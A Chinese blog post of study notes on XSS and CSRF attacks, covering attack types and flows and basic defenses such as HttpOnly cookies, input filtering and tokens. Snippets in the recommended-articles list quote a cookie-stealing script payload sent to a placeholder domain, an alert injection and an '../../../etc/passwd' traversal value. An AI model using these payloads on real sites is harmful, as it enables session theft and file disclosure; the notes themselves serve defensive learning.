WEB常见攻击手段

最新推荐文章于 2023-04-28 09:30:00 发布
最新推荐文章于 2023-04-28 09:30:00 发布
阅读量303 收藏 2
点赞数
分类专栏: 前端 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44787934/article/details/104822105
版权

昨天,学习了一下web常见攻击手段,记录一下,以便日后查看

1. XSS

	全称:**跨站脚本攻击**(cross site script)
	为了不与css名称冲突,简写为XSS

在web页面中,嵌入一些恶意的脚本,用户浏览网页时,就会执行脚本代码
以XSS方式在web页面上写一些js脚本执行恶意的操作

1.1XSS攻击的危害

		(1).盗取用户的账号,用户的,管理员	
		(2).控制了企业的管理数据,读取,篡改,删除数据等等
		(3).盗取公司商业机密数据
		(4).非法转账
		(5).恶意发送广告、电子邮件
		(6).控制受害者的机器、向其他的网站发起攻击

1.2.XSS攻击分类

			(1).基于本地DOM发起攻击
			a给b发送了一个恶意url链接,向dom中注入恶意代码
			(2).反射式
			服务器端没有进行数据过滤、验证、编码等安全操作,直接返回给前端就会引起漏铜出现
			a给b发送了一个恶意url链接
			b打开url链接,进入目标网站,服务器端没有安全处理,又将数据传给前端
			b浏览器 接受返回的信息,就会执行此恶意代码
			
			(3).存储式	持久性攻击
			类似反射式,把未经处理的数据存储到数据库中,危害性更大,涉及面积更广
			a提交恶意代码到目标网站数据库中
			b打开目标网站时,服务器端会将数据库中保存的恶意代码,返回给浏览器
			b的浏览器会解析执行此恶意代码

1.3.XSS攻击方式

		1.所有用户输入的地方,都有风险
		2.script嵌套js代码
		3.包含href属性和src属性
		4.利用事件、onload、onscroll
		5.利用样式,background-images
		6.URL参数
		7.Cookie

1.4防御方式

	   (1)设置cookie httponly 禁止脚本读取信息
	   (2)xss过滤器
			验证用户输入的数据
			过滤一些危险的信息
			移除script和iframe标签
			移出特殊的js代码,事件

2.CSRF

全称:跨站请求伪造(cross site request forgery)
xss是利用站点信任的用户
csrf是伪装成受信任的用户

2.1CSRF攻击流程

	1.用户登录a.com,保留的登录的信息
	2.攻击者有盗取用户点击恶意链接,访问了恶意网站的b.com
	3.b.com在用户不知情的情况下,向a.com 发送恶意请求,携带用户的登录信息
	4.a.com会认为b.com是当前登录的用户,执行此恶意请求的操作
	5.攻击者就在用户不知情的清况下完成了攻击操作

2.2防御

	1.验证码、短信验证
	2.同源限制、不是同源的就拒绝执行
	3.token验证
小米粒mm
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB前端常见攻击方式及解决办法总结
10-15
WEB前端常见攻击方式及解决办法】 ...开发者应时刻保持警惕,定期评估和更新安全措施,以应对不断演变的攻击手段。通过学习和应用这些知识,可以有效减少网站遭受攻击的风险,保护用户的数据安全。
常见WEB漏洞原理分析及防护
08-22
比较常用的手段有使用注释符号、恒等式(如 1=1)、使用 union 语句进行联合查询、使用 insert 或 update 语句插入或修改数据等,此外还可以利用一些内置函数辅助攻击。通过 SQL 注入漏洞攻击网站的步骤一般如下: ...
【图解HTTP】|【09】Web攻击技术
weixin_45926547的博客
05-29 3387
文章目录1、针对Web攻击技术1.1 客户端即可篡改请求1.2 针对Web应用的攻击模式2、因输出值转义不完全引发的安全漏洞2.1 跨站脚本攻击2.2 SQL注入攻击 1、针对Web攻击技术 1.1 客户端即可篡改请求 HTTP请求报文内加载URL查询字段或表单、HTTP首部、Cookie等将攻击传入; 若Web应用存在安全漏洞,那么内部信息就会遭到窃取,或被攻击者拿到管理权限; 1.2 针对Web应用的攻击模式 对Web应用的攻击模式: - 主动攻击; - 被动攻击; 【主动攻击】:指攻击者通
常见的前端攻击及解决方式有哪些?----简洁易懂】
weixin_42936434的博客
01-31 885
你所了解的前端攻击手段有哪些,该如何预防?
黑客在攻击前会做哪些准备?
分享Python知识
04-28 467
黑客在攻击前会做哪些准备?
web常见攻击方式
weixin_50736511的博客
04-18 1万+
xss攻击 用户通过浏览器访问web网页,xss攻击通过各种办法在用户访问页面的时候,插入一些自己的代码或者脚本,让用户访问页面的时候,就可以执行这个脚本,攻击者通过插入的脚本的执行就会获得一些信息(比如cookie),发送到攻击者自己的网站,这就是跨站 xss的危害 1.挂马 把一个木马程序插入一个网站中,利用木马生成器生成一个网码,在传到服务器上,加上一写代码就可以让这个木马程序在打开网页的时候运行, 2.盗取用户的cookie 3.DDOS(拒绝服务)客户端浏览器 4.钓鱼攻击 5.删除目标文章,恶意
Web安全知多少
weixin_30896511的博客
08-05 1099
随着Web2.0、网络社交等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中,越来越多的应用都架设在Web平台上。Web业务的迅速发展吸引了黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得...
常见Web攻击手段及安全防范.docx
09-07
常见Web攻击手段及安全防范.docx
Web应用安全:攻击手段与影响.pptx
06-20
以下是对攻击手段及影响的详细分析: 1. 客户端校验:客户端通常使用JavaScript进行文件类型检查,限制上传的文件后缀。然而,JavaScript校验可被轻易绕过,如禁用浏览器的JavaScript或利用跨站脚本(XSS)注入攻击...
Web攻击检测与分类识别数据集
08-30
某业务平台平均每月捕获到Web攻击数量超过2亿,涉及常见注入攻击,代码执行等类型。传统威胁检测手段通过分析已知攻击特征进行规则匹配,无法检测未知漏洞或攻击手法。如何快速准确地识别未知威胁攻击并且将不同攻击...
web程序攻击方式以及解决方法
10-29
十种web程序攻击方式以及解决方法
web服务器攻击的八种方式
2301_76161259的博客
03-29 3094
随着互联网的高速发展,网络走进了千家万户,同时也有很大一部分人架设起了自己的网站。继而不安分的黑客们,又将目光对准了服务器攻击这个方式,从而破坏或取得服务器的管理权限。本文将主要讲述针对web服务器攻击的八种方式。这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站的WEBSHELL,从而达到服务器攻击的目的。
JS每日一题: web安全攻击手段有哪些?以及如何防范
weixin_34310127的博客
01-23 483
20190112问: web安全攻击手段有哪些?以及如何防范 常见的有xss, csrf, sql注入 xss(cross site scripting) 跨站脚本攻击 定义: 指攻击者在网页嵌入脚本,用户浏览网页触发恶意脚本执行 XSS攻击分为3类:存储型(持久型)、反射型(非持久型)、基于DOM 如何防范: 设置HttpOnly以避免cookie劫持的危险 过滤,对诸如<script&g...
网站常用攻击技术详解
qq_55624813的博客
11-15 3916
一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会被渲染成以下形式: <p><script>location.
网站攻击常见的几种方式
weixin_43017996的博客
06-18 1万+
1、xss攻击:跨站脚本攻击,在网页中嵌入恶意脚本,盗取客户端cookie、用户名、密码等; 例:##原始表单 <input type="text" name="firstname" value=""/><script>alert("longlong")</script><!-- "/>##输入恶意脚本对输入做处理 页面会显示longlong的告警显示 2、csrf攻击:跨站请求伪造,一般是利用cookie 一般场景:1、User登录信任站点A,得到本地
Web攻击及防御
龙卷风摧毁停车场
10-13 1871
目录穿越 原理 目录穿越(也被称为目录遍历/directory traversal/path traversal)是通过使用 …/ 等目录控制序列或者文件的绝对路径来访问存储在文件系统上的任意文件和目录,特别是应用程序源代码、配置文件、重要的系统文件等。 攻击方式 基础目录遍历 修改filename的参数值,利用../返回上一级遍历任意文件 修改为 filename=../../../etc/passwd 绝对路径 有些网站会采取目录遍历的防护措施,如过滤掉../等关键字 可通过绝对路径,无需返回上级
web常见攻击方式有哪些?如何防御?】
weixin_59763367的博客
12-10 654
web常见攻击方式
常见web前端攻击方式有哪些?
louShuMei 的博客
07-17 717
XSS跨站请求攻击 场景: 一个博客网站,我发表一篇博客,其中嵌入脚本. 脚本内容:获取cookie,发送到我的服务器(服务端配合跨域). 有人查看这篇博客,我轻松收割访问者的cookie XSS预防 替换特殊字符,如< 变成 &lt ; >变成 &gt ; <script>变成 & ltscript &gt;直接显示,而不会作为脚本执行 前端要做替换,后端也要做替换,双重保证。 XSRF跨站请求伪造 场景: 你正在购物,看中了某个商品,商品
web网站中常见攻击手法与原理
热门推荐
如故的博客
06-20 1万+
web网站中常见攻击手法与原理 01, 跨站脚本攻击(xss) 恶意攻击者通过往Web页面里插入恶意html代码,当用户浏览该页时,嵌入Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 分析一下xss的特点: 1、耗时间 2、有一定几率不成功 3、没有相应的软件来完成自动化攻击 4、前期需要基本的html、js功底,后期需要扎实的html、js...
常见的网络攻击手段有哪些
最新发布
11-09
攻击手段有很多种,以下是其中一些常见的网络攻击手段: 1. DDoS攻击:通过向目标服务器发送大量的请求,使其无法正常响应合法用户的请求。 2. SQL注入攻击:通过在Web应用程序中注入恶意的SQL代码,从而获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值